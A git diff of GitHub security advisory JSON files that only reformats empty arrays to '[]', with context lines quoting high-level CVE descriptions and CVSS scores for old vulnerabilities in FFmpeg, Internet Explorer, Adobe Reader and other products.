a/advisories/unreviewed/2022/05/GHSA-4f6w-v2mv-qm2r/GHSA-4f6w-v2mv-qm2r.json +++ b/advisories/unreviewed/2022/05/GHSA-4f6w-v2mv-qm2r/GHSA-4f6w-v2mv-qm2r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4fg8-5vph-xm45/GHSA-4fg8-5vph-xm45.json b/advisories/unreviewed/2022/05/GHSA-4fg8-5vph-xm45/GHSA-4fg8-5vph-xm45.json index aefc78647fa..041c95cf1bc 100644 --- a/advisories/unreviewed/2022/05/GHSA-4fg8-5vph-xm45/GHSA-4fg8-5vph-xm45.json +++ b/advisories/unreviewed/2022/05/GHSA-4fg8-5vph-xm45/GHSA-4fg8-5vph-xm45.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4fp9-hr59-c2fp/GHSA-4fp9-hr59-c2fp.json b/advisories/unreviewed/2022/05/GHSA-4fp9-hr59-c2fp/GHSA-4fp9-hr59-c2fp.json index 94147b8f42d..365d6c83ed3 100644 --- a/advisories/unreviewed/2022/05/GHSA-4fp9-hr59-c2fp/GHSA-4fp9-hr59-c2fp.json +++ b/advisories/unreviewed/2022/05/GHSA-4fp9-hr59-c2fp/GHSA-4fp9-hr59-c2fp.json @@ -7,12 +7,8 @@ "CVE-2013-0894" ], "details": "Buffer overflow in the vorbis_parse_setup_hdr_floors function in the Vorbis decoder in vorbisdec.c in libavcodec in FFmpeg through 1.1.3, as used in Google Chrome before 25.0.1364.97 on Windows and Linux and before 25.0.1364.99 on Mac OS X and other products, allows remote attackers to cause a denial of service (divide-by-zero error or out-of-bounds array access) or possibly have unspecified other impact via vectors involving a zero value for a bark map size.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4gjp-wgmq-qr4c/GHSA-4gjp-wgmq-qr4c.json b/advisories/unreviewed/2022/05/GHSA-4gjp-wgmq-qr4c/GHSA-4gjp-wgmq-qr4c.json index c16c25ba6c5..feeea112a13 100644 --- a/advisories/unreviewed/2022/05/GHSA-4gjp-wgmq-qr4c/GHSA-4gjp-wgmq-qr4c.json +++ b/advisories/unreviewed/2022/05/GHSA-4gjp-wgmq-qr4c/GHSA-4gjp-wgmq-qr4c.json @@ -7,12 +7,8 @@ "CVE-2012-2420" ], "details": "The intu-help-qb (aka Intuit Help System Async Pluggable Protocol) handlers in HelpAsyncPluggableProtocol.dll in Intuit QuickBooks 2009 through 2012, when Internet Explorer is used, might allow remote attackers to obtain sensitive information via a URI with a % (percent) character as its (1) last or (2) second-to-last character, in situations where a certain \"post-URL data\" buffer contains a 0x0000 character but a buffer overflow does not occur.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4gpm-6hmq-c6mr/GHSA-4gpm-6hmq-c6mr.json b/advisories/unreviewed/2022/05/GHSA-4gpm-6hmq-c6mr/GHSA-4gpm-6hmq-c6mr.json index 6f4e783836b..017b83b0bdb 100644 --- a/advisories/unreviewed/2022/05/GHSA-4gpm-6hmq-c6mr/GHSA-4gpm-6hmq-c6mr.json +++ b/advisories/unreviewed/2022/05/GHSA-4gpm-6hmq-c6mr/GHSA-4gpm-6hmq-c6mr.json @@ -7,12 +7,8 @@ "CVE-2015-5094" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-3095, CVE-2015-5087, CVE-2015-5100, CVE-2015-5102, CVE-2015-5103, CVE-2015-5104, and CVE-2015-5115.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4h55-j4r4-687w/GHSA-4h55-j4r4-687w.json b/advisories/unreviewed/2022/05/GHSA-4h55-j4r4-687w/GHSA-4h55-j4r4-687w.json index d536c2d65db..9260fcafece 100644 --- a/advisories/unreviewed/2022/05/GHSA-4h55-j4r4-687w/GHSA-4h55-j4r4-687w.json +++ b/advisories/unreviewed/2022/05/GHSA-4h55-j4r4-687w/GHSA-4h55-j4r4-687w.json @@ -7,12 +7,8 @@ "CVE-2012-1874" ], "details": "Microsoft Internet Explorer 8 and 9 does not properly handle objects in memory, which allows user-assisted remote attackers to execute arbitrary code by accessing a deleted object, aka \"Developer Toolbar Remote Code Execution Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4h96-7qc2-2vv3/GHSA-4h96-7qc2-2vv3.json b/advisories/unreviewed/2022/05/GHSA-4h96-7qc2-2vv3/GHSA-4h96-7qc2-2vv3.json index 577deebc4c2..682866c34f5 100644 --- a/advisories/unreviewed/2022/05/GHSA-4h96-7qc2-2vv3/GHSA-4h96-7qc2-2vv3.json +++ b/advisories/unreviewed/2022/05/GHSA-4h96-7qc2-2vv3/GHSA-4h96-7qc2-2vv3.json @@ -7,12 +7,8 @@ "CVE-2010-2657" ], "details": "Opera before 10.60 on Windows and Mac OS X does not properly prevent certain double-click operations from running a program located on a web site, which allows user-assisted remote attackers to execute arbitrary code via a crafted web page that bypasses a dialog.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4h9v-63rw-p289/GHSA-4h9v-63rw-p289.json b/advisories/unreviewed/2022/05/GHSA-4h9v-63rw-p289/GHSA-4h9v-63rw-p289.json index 4db97e4b2d3..9278c09d251 100644 --- a/advisories/unreviewed/2022/05/GHSA-4h9v-63rw-p289/GHSA-4h9v-63rw-p289.json +++ b/advisories/unreviewed/2022/05/GHSA-4h9v-63rw-p289/GHSA-4h9v-63rw-p289.json @@ -7,12 +7,8 @@ "CVE-2015-4441" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-4435, CVE-2015-4438, CVE-2015-4445, CVE-2015-4447, CVE-2015-4451, CVE-2015-4452, CVE-2015-5085, and CVE-2015-5086.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4hj8-x4jj-w73c/GHSA-4hj8-x4jj-w73c.json b/advisories/unreviewed/2022/05/GHSA-4hj8-x4jj-w73c/GHSA-4hj8-x4jj-w73c.json index e346cd22a34..dcc94d73b77 100644 --- a/advisories/unreviewed/2022/05/GHSA-4hj8-x4jj-w73c/GHSA-4hj8-x4jj-w73c.json +++ b/advisories/unreviewed/2022/05/GHSA-4hj8-x4jj-w73c/GHSA-4hj8-x4jj-w73c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4hwx-98xh-r7rc/GHSA-4hwx-98xh-r7rc.json b/advisories/unreviewed/2022/05/GHSA-4hwx-98xh-r7rc/GHSA-4hwx-98xh-r7rc.json index 7c52c3e6f97..a8324f2fe97 100644 --- a/advisories/unreviewed/2022/05/GHSA-4hwx-98xh-r7rc/GHSA-4hwx-98xh-r7rc.json +++ b/advisories/unreviewed/2022/05/GHSA-4hwx-98xh-r7rc/GHSA-4hwx-98xh-r7rc.json @@ -7,12 +7,8 @@ "CVE-2011-1260" ], "details": "Microsoft Internet Explorer 8 and 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka \"Layout Memory Corruption Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4j2w-7g66-47wp/GHSA-4j2w-7g66-47wp.json b/advisories/unreviewed/2022/05/GHSA-4j2w-7g66-47wp/GHSA-4j2w-7g66-47wp.json index 9c70c599b2f..16d0ec822b5 100644 --- a/advisories/unreviewed/2022/05/GHSA-4j2w-7g66-47wp/GHSA-4j2w-7g66-47wp.json +++ b/advisories/unreviewed/2022/05/GHSA-4j2w-7g66-47wp/GHSA-4j2w-7g66-47wp.json @@ -7,12 +7,8 @@ "CVE-2013-6903" ], "details": "Cross-site scripting (XSS) vulnerability in a schedule component in Cybozu Garoon before 3.7.0, when Internet Explorer or Firefox is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4j77-57g7-9jgm/GHSA-4j77-57g7-9jgm.json b/advisories/unreviewed/2022/05/GHSA-4j77-57g7-9jgm/GHSA-4j77-57g7-9jgm.json index 32ae5cadfec..5f9a8ff95f4 100644 --- a/advisories/unreviewed/2022/05/GHSA-4j77-57g7-9jgm/GHSA-4j77-57g7-9jgm.json +++ b/advisories/unreviewed/2022/05/GHSA-4j77-57g7-9jgm/GHSA-4j77-57g7-9jgm.json @@ -7,12 +7,8 @@ "CVE-2015-6686" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted set of fields, a different vulnerability than CVE-2015-6685, CVE-2015-6693, CVE-2015-6694, CVE-2015-6695, and CVE-2015-7622.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4jgr-5qw5-7m4m/GHSA-4jgr-5qw5-7m4m.json b/advisories/unreviewed/2022/05/GHSA-4jgr-5qw5-7m4m/GHSA-4jgr-5qw5-7m4m.json index 3e5e556d227..ed4e84cc55c 100644 --- a/advisories/unreviewed/2022/05/GHSA-4jgr-5qw5-7m4m/GHSA-4jgr-5qw5-7m4m.json +++ b/advisories/unreviewed/2022/05/GHSA-4jgr-5qw5-7m4m/GHSA-4jgr-5qw5-7m4m.json @@ -7,12 +7,8 @@ "CVE-2014-9224" ], "details": "Cross-site scripting (XSS) vulnerability in the ajaxswing webui in the Management Console server in the management server in Symantec Critical System Protection (SCSP) 5.2.9 through MP6 and Symantec Data Center Security: Server Advanced (SDCS:SA) 6.0.x through 6.0 MP1 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4pp2-m693-v6x9/GHSA-4pp2-m693-v6x9.json b/advisories/unreviewed/2022/05/GHSA-4pp2-m693-v6x9/GHSA-4pp2-m693-v6x9.json index ee15b6ec4dc..d09ecf5a62e 100644 --- a/advisories/unreviewed/2022/05/GHSA-4pp2-m693-v6x9/GHSA-4pp2-m693-v6x9.json +++ b/advisories/unreviewed/2022/05/GHSA-4pp2-m693-v6x9/GHSA-4pp2-m693-v6x9.json @@ -7,12 +7,8 @@ "CVE-2014-7289" ], "details": "SQL injection vulnerability in the management server in Symantec Critical System Protection (SCSP) 5.2.9 before MP6 and Symantec Data Center Security: Server Advanced (SDCS:SA) 6.0.x before 6.0 MP1 allows remote authenticated users to execute arbitrary SQL commands via a crafted HTTP request.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4q2g-2wf5-83r6/GHSA-4q2g-2wf5-83r6.json b/advisories/unreviewed/2022/05/GHSA-4q2g-2wf5-83r6/GHSA-4q2g-2wf5-83r6.json index b2e7d0e9b42..4f57ffdd222 100644 --- a/advisories/unreviewed/2022/05/GHSA-4q2g-2wf5-83r6/GHSA-4q2g-2wf5-83r6.json +++ b/advisories/unreviewed/2022/05/GHSA-4q2g-2wf5-83r6/GHSA-4q2g-2wf5-83r6.json @@ -7,12 +7,8 @@ "CVE-2015-7615" ], "details": "Use-after-free vulnerability in a SaveAs feature in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-5586, CVE-2015-6683, CVE-2015-6684, CVE-2015-6687, CVE-2015-6688, CVE-2015-6689, CVE-2015-6690, CVE-2015-6691, CVE-2015-7617, and CVE-2015-7621.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4rxj-vw6j-qqrf/GHSA-4rxj-vw6j-qqrf.json b/advisories/unreviewed/2022/05/GHSA-4rxj-vw6j-qqrf/GHSA-4rxj-vw6j-qqrf.json index 9b0e4872571..12d7d52bf86 100644 --- a/advisories/unreviewed/2022/05/GHSA-4rxj-vw6j-qqrf/GHSA-4rxj-vw6j-qqrf.json +++ b/advisories/unreviewed/2022/05/GHSA-4rxj-vw6j-qqrf/GHSA-4rxj-vw6j-qqrf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4w74-m972-3526/GHSA-4w74-m972-3526.json b/advisories/unreviewed/2022/05/GHSA-4w74-m972-3526/GHSA-4w74-m972-3526.json index 59bcc14f65d..e0d94ebcfb0 100644 --- a/advisories/unreviewed/2022/05/GHSA-4w74-m972-3526/GHSA-4w74-m972-3526.json +++ b/advisories/unreviewed/2022/05/GHSA-4w74-m972-3526/GHSA-4w74-m972-3526.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4wh8-429w-mwgr/GHSA-4wh8-429w-mwgr.json b/advisories/unreviewed/2022/05/GHSA-4wh8-429w-mwgr/GHSA-4wh8-429w-mwgr.json index 5ed87577b1b..3131576ce4f 100644 --- a/advisories/unreviewed/2022/05/GHSA-4wh8-429w-mwgr/GHSA-4wh8-429w-mwgr.json +++ b/advisories/unreviewed/2022/05/GHSA-4wh8-429w-mwgr/GHSA-4wh8-429w-mwgr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4wv2-475w-c2fw/GHSA-4wv2-475w-c2fw.json b/advisories/unreviewed/2022/05/GHSA-4wv2-475w-c2fw/GHSA-4wv2-475w-c2fw.json index 4de155522f3..b208bffd798 100644 --- a/advisories/unreviewed/2022/05/GHSA-4wv2-475w-c2fw/GHSA-4wv2-475w-c2fw.json +++ b/advisories/unreviewed/2022/05/GHSA-4wv2-475w-c2fw/GHSA-4wv2-475w-c2fw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4x9w-cq9p-gmpf/GHSA-4x9w-cq9p-gmpf.json b/advisories/unreviewed/2022/05/GHSA-4x9w-cq9p-gmpf/GHSA-4x9w-cq9p-gmpf.json index 6d8d048ab10..1b1415bb674 100644 --- a/advisories/unreviewed/2022/05/GHSA-4x9w-cq9p-gmpf/GHSA-4x9w-cq9p-gmpf.json +++ b/advisories/unreviewed/2022/05/GHSA-4x9w-cq9p-gmpf/GHSA-4x9w-cq9p-gmpf.json @@ -7,12 +7,8 @@ "CVE-2015-5091" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to cause a denial of service via invalid data.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5297-rr9c-r4f6/GHSA-5297-rr9c-r4f6.json b/advisories/unreviewed/2022/05/GHSA-5297-rr9c-r4f6/GHSA-5297-rr9c-r4f6.json index fcf7b8dbee9..8831d1ef304 100644 --- a/advisories/unreviewed/2022/05/GHSA-5297-rr9c-r4f6/GHSA-5297-rr9c-r4f6.json +++ b/advisories/unreviewed/2022/05/GHSA-5297-rr9c-r4f6/GHSA-5297-rr9c-r4f6.json @@ -7,12 +7,8 @@ "CVE-2015-7622" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-6685, CVE-2015-6686, CVE-2015-6693, CVE-2015-6694, and CVE-2015-6695.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-52vr-h4mx-5468/GHSA-52vr-h4mx-5468.json b/advisories/unreviewed/2022/05/GHSA-52vr-h4mx-5468/GHSA-52vr-h4mx-5468.json index 85408c35816..03290498a14 100644 --- a/advisories/unreviewed/2022/05/GHSA-52vr-h4mx-5468/GHSA-52vr-h4mx-5468.json +++ b/advisories/unreviewed/2022/05/GHSA-52vr-h4mx-5468/GHSA-52vr-h4mx-5468.json @@ -7,12 +7,8 @@ "CVE-2014-0930" ], "details": "The ptrace system call in IBM AIX 5.3, 6.1, and 7.1, and VIOS 2.2.x, allows local users to cause a denial of service (system crash) or obtain sensitive information from kernel memory via a crafted PT_LDINFO operation.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -64,9 +60,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-54jh-f498-frrg/GHSA-54jh-f498-frrg.json b/advisories/unreviewed/2022/05/GHSA-54jh-f498-frrg/GHSA-54jh-f498-frrg.json index a4275cf7a91..8c6855d4f99 100644 --- a/advisories/unreviewed/2022/05/GHSA-54jh-f498-frrg/GHSA-54jh-f498-frrg.json +++ b/advisories/unreviewed/2022/05/GHSA-54jh-f498-frrg/GHSA-54jh-f498-frrg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-54pp-mp7p-hhp9/GHSA-54pp-mp7p-hhp9.json b/advisories/unreviewed/2022/05/GHSA-54pp-mp7p-hhp9/GHSA-54pp-mp7p-hhp9.json index 2b58b780dbc..7e0d935b0dc 100644 --- a/advisories/unreviewed/2022/05/GHSA-54pp-mp7p-hhp9/GHSA-54pp-mp7p-hhp9.json +++ b/advisories/unreviewed/2022/05/GHSA-54pp-mp7p-hhp9/GHSA-54pp-mp7p-hhp9.json @@ -7,12 +7,8 @@ "CVE-2015-5105" ], "details": "Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-5096 and CVE-2015-5098.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-558w-72f6-cp4j/GHSA-558w-72f6-cp4j.json b/advisories/unreviewed/2022/05/GHSA-558w-72f6-cp4j/GHSA-558w-72f6-cp4j.json index 2dac6f93625..dbeb0a04da0 100644 --- a/advisories/unreviewed/2022/05/GHSA-558w-72f6-cp4j/GHSA-558w-72f6-cp4j.json +++ b/advisories/unreviewed/2022/05/GHSA-558w-72f6-cp4j/GHSA-558w-72f6-cp4j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-559v-gq75-3cch/GHSA-559v-gq75-3cch.json b/advisories/unreviewed/2022/05/GHSA-559v-gq75-3cch/GHSA-559v-gq75-3cch.json index 0333a766ae3..8e435bec6da 100644 --- a/advisories/unreviewed/2022/05/GHSA-559v-gq75-3cch/GHSA-559v-gq75-3cch.json +++ b/advisories/unreviewed/2022/05/GHSA-559v-gq75-3cch/GHSA-559v-gq75-3cch.json @@ -7,12 +7,8 @@ "CVE-2012-1881" ], "details": "Microsoft Internet Explorer 8 and 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka \"OnRowsInserted Event Remote Code Execution Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-55mp-fxfv-hr5j/GHSA-55mp-fxfv-hr5j.json b/advisories/unreviewed/2022/05/GHSA-55mp-fxfv-hr5j/GHSA-55mp-fxfv-hr5j.json index 47a2c1c1160..1742fb46760 100644 --- a/advisories/unreviewed/2022/05/GHSA-55mp-fxfv-hr5j/GHSA-55mp-fxfv-hr5j.json +++ b/advisories/unreviewed/2022/05/GHSA-55mp-fxfv-hr5j/GHSA-55mp-fxfv-hr5j.json @@ -7,12 +7,8 @@ "CVE-2010-1991" ], "details": "Microsoft Internet Explorer 6.0.2900.2180, 7, and 8.0.7600.16385 executes a mail application in situations where an IFRAME element has a mailto: URL in its SRC attribute, which allows remote attackers to cause a denial of service (excessive application launches) via an HTML document with many IFRAME elements.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-56mj-8h6j-vxp8/GHSA-56mj-8h6j-vxp8.json b/advisories/unreviewed/2022/05/GHSA-56mj-8h6j-vxp8/GHSA-56mj-8h6j-vxp8.json index 50c5e57d439..4badd477465 100644 --- a/advisories/unreviewed/2022/05/GHSA-56mj-8h6j-vxp8/GHSA-56mj-8h6j-vxp8.json +++ b/advisories/unreviewed/2022/05/GHSA-56mj-8h6j-vxp8/GHSA-56mj-8h6j-vxp8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-56xc-mxq5-pxmw/GHSA-56xc-mxq5-pxmw.json b/advisories/unreviewed/2022/05/GHSA-56xc-mxq5-pxmw/GHSA-56xc-mxq5-pxmw.json index 348e87f7c92..0eceaab974e 100644 --- a/advisories/unreviewed/2022/05/GHSA-56xc-mxq5-pxmw/GHSA-56xc-mxq5-pxmw.json +++ b/advisories/unreviewed/2022/05/GHSA-56xc-mxq5-pxmw/GHSA-56xc-mxq5-pxmw.json @@ -7,12 +7,8 @@ "CVE-2015-6720" ], "details": "The ANRunSharedReviewEmailStep method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7614, CVE-2015-7616, CVE-2015-7618, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-57r2-cmqp-xp55/GHSA-57r2-cmqp-xp55.json b/advisories/unreviewed/2022/05/GHSA-57r2-cmqp-xp55/GHSA-57r2-cmqp-xp55.json index 348d7d710f6..6c25f259875 100644 --- a/advisories/unreviewed/2022/05/GHSA-57r2-cmqp-xp55/GHSA-57r2-cmqp-xp55.json +++ b/advisories/unreviewed/2022/05/GHSA-57r2-cmqp-xp55/GHSA-57r2-cmqp-xp55.json @@ -7,12 +7,8 @@ "CVE-2015-5100" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-3095, CVE-2015-5087, CVE-2015-5094, CVE-2015-5102, CVE-2015-5103, CVE-2015-5104, and CVE-2015-5115.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-57v8-77c7-ghr7/GHSA-57v8-77c7-ghr7.json b/advisories/unreviewed/2022/05/GHSA-57v8-77c7-ghr7/GHSA-57v8-77c7-ghr7.json index e68f83494a7..3b3b63756fa 100644 --- a/advisories/unreviewed/2022/05/GHSA-57v8-77c7-ghr7/GHSA-57v8-77c7-ghr7.json +++ b/advisories/unreviewed/2022/05/GHSA-57v8-77c7-ghr7/GHSA-57v8-77c7-ghr7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-59r7-7hc4-v4rf/GHSA-59r7-7hc4-v4rf.json b/advisories/unreviewed/2022/05/GHSA-59r7-7hc4-v4rf/GHSA-59r7-7hc4-v4rf.json index c9653816c4b..8dc8fe91b36 100644 --- a/advisories/unreviewed/2022/05/GHSA-59r7-7hc4-v4rf/GHSA-59r7-7hc4-v4rf.json +++ b/advisories/unreviewed/2022/05/GHSA-59r7-7hc4-v4rf/GHSA-59r7-7hc4-v4rf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -75,9 +73,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-5f5w-vcxh-m5gf/GHSA-5f5w-vcxh-m5gf.json 